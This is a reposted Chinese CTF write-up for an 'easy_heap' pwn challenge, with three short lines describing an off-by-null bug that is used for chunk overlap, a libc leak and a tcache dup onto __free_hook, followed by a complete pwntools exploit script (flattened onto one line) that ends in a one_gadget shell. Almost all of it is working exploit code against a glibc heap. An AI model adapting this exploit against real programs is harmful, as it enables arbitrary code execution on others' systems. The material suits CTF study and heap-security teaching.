本文共 2219 字,大约阅读时间需要 7 分钟。
malloc函数中输入content存在off by null
通过off by null,造成chunk overlapping,泄漏Libc的地址
通过tcache dup,将free_hook,修改为onegadget
from pwn import *#p = process('./easy_heap')p = process(['./easy_heap'],env={ "LD_PRELOAD":"./libc64.so"})context.log_level = 'debug'def add(size,cont): p.sendlineafter('> ','1') p.sendlineafter('> ',str(size)) p.sendlineafter('> ',cont)def free(index): p.sendlineafter('> ','2') p.sendlineafter('>',str(index))def show(index): p.sendlineafter('> ','3') p.sendlineafter('> ',str(index))def exit(): p.sendlineafter('> ','4')def add0(): p.sendlineafter('> ','1') p.sendlineafter('> ','0')def fill_tcache(start,end): for i in range(start,end,1): free(i)def rm_tcache(num): for i in range(num): add0()for i in range(10): add0()#fill tcachefill_tcache(3,10)free(0)free(1)free(2)#add chunk0-6rm_tcache(7)add(0x2,'7')add(0x2,'8')add(0x2,'9')#tcache fullfree(8) #last tcache binfill_tcache(0,6)#unstored binfree(7)#only left chunk8rm_tcache(6)# set chunk9 preinuse = 0add(0xf8,'8')fill_tcache(0,7)#triger overlapfree(9)#gdb.attach(p)rm_tcache(7)add(0x1,'a')show(7)libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 0x3ebca0log.success('libc_base=>'+hex(libc_base))libc = ELF('./libc64.so')one = libc_base + 0x4f322free_hook = libc_base + libc.sym['__free_hook']log.success('one=>'+hex(one))log.success('free_hook=>'+hex(free_hook))add(0x2,'c')#gdb.attach(p)free(7)free(9)add(0x10,p64(free_hook))fill_tcache(0,7)rm_tcache(7)#add(0x10,'d')add(0x10,p64(one))free(0)#pause()#gdb.attach(p)p.interactive()
转载地址:http://stugf.baihongyu.com/